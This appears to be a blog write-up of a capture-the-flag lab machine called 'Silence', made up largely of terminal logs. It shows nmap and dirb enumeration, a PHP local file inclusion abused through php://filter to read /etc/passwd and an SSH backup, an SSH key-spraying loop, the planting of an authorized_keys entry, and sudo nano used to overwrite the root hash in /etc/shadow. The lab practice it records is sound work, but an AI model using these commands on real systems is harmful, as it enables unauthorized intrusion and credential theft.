ptd-silence-private

.

.

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat allports.nmap 
# Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55
Nmap scan report for 10.150.150.55
Host is up (0.032s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 13 Jun 12 2020 test
| ftp-syst: 
| STAT: 
| FTP server status:
| Connected to ::ffff:10.66.66.42
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
1055/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 53m37s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2021-02-17T08:57:32
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]

.

 

┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Thu Feb 18 08:27:26 2021
URL_BASE: http://10.150.150.55/
WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 10000

---- Scanning URL: http://10.150.150.55/ ----
+ http://10.150.150.55/trick.php (CODE:200|SIZE:0) 
+ http://10.150.150.55/info.php (CODE:200|SIZE:70050) 
+ http://10.150.150.55/??????.php (CODE:200|SIZE:10918) 
+ http://10.150.150.55/?????.php (CODE:200|SIZE:10918) 

-----------------
END_TIME: Thu Feb 18 08:32:58 2021
DOWNLOADED: 10000 - FOUND: 4
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat trick.php 
<?php

include($_GET['page']);

?>

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST –data “file=browser.php” 10.150.150.55/info.php

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $smbclient -L 10.150.150.55 -U "" -N

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

trick.php?page=index.html

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php

En in die source vind je dan:
index.php?path=/

=> http://10.150.150.55/index.php?path=/

http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz

curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz’ | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $ls -la
total 256
drwxr-xr-x 1 user user 138 Feb 17 10:55 .
drwxr-xr-x 1 user user 2034 Feb 17 08:02 ..
-rw-r--r-- 1 user user 1617 Feb 17 08:03 allports.nmap
-rw-r--r-- 1 user user 56184 Feb 17 10:45 browser.php
-rw-r--r-- 1 user user 6 Feb 17 08:05 hallo.txt
-rw-r--r-- 1 user user 4694 Feb 17 10:24 index.php
-rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz
-rw-r--r-- 1 user user 13 Feb 17 08:06 test
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 4128 100 4128 0 0 58971 0 --:--:-- --:--:-- --:--:-- 58971
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
gary:x:1001:1001::/home/gary:/bin/sh
john:x:1002:1002::/home/john:/bin/sh
sally:x:1003:1003::/home/sally:/bin/sh
alice:x:1004:1004::/home/alice:/bin/sh
ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin
ftpuser:x:1005:1005::/home/ftpuser:/bin/sh
Debian-snmp:x:128:136::/var/lib/snmp:/bin/false
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i $key; done

En dan zelfde voor andere users (gary, sally en alice)
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i $key; done

curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt’ | base64 -d > FLAG79.txt

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9I2y+p4cBMuaydINICFfYW7EFhDJA0DaLxokCz5UutruL+oNA2oJmeAqdK1CaHyfQd56TSnzCruadO3mOCjzCLBuxDxYTJxsOpOaaJP/fUfFrUG2A1rqQzxXYy6ylQEJzyN+bdO5U3C7HpY7W5LMRZls8bw8YhO+PMZVS7Nv6z/+iDbqk56RyG2yDcb8aJDX3WTv0jTMbNRCUfn2dZzoXymGbZcKpUd2ep4u+G4wHOceDHxAAB2bPZYIJcEsTsmDjtKueJCb9deOOWtZ/Y9ZLmnA807KiHhbAquiWTazNNFiFrKQv0/aJpW9q19ZYRE1GUz6WNLcYFJsbBzLWmjTXMoHIBtNVnd0KuRYKubRNcENNIg2IebCdV5NcYuzE8+AUGyIR8EAmZ4s8XCWMk/yj1kPep+PcyHMj+QaP6kn3i1ub2As39K6WB6txDo4CzIv3EFWprtRX3o43/ItSLVmhTK2QVfgEcefAyCV52b8LKvjPJ0QZB1Ka2L5ogagc9XU= root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log

User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano

$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password: 
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#

root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#

Author : Puckiestyle

 

Posted on

2 thoughts on “ptd-silence-private”

  1. Hi,

    Thanks for the writeup.
    Actually, if I can log in with ssh into all accounts (except john), I do not understand how I can create the authorized_keys in john’s directory (no rights).
    Can you explain please ?

    1. If you ssh login to gary, you will see that chatBackup file said that both John and Sally are network admin, which can help for ssh access,so when using the above for loop can get the Sally id_rsa key and log in with it, then switch to john home directory, using ls -la, will see .ssh directory (only accessible by john or netAdmin group) , then in your own machine can use tool (ssh-keygen) to create ssh key pair, and overwrite the authorized_key in john .ssh directory with new pub key you created, then can ssh to john using the private key.

Leave a Reply

Your email address will not be published. Required fields are marked *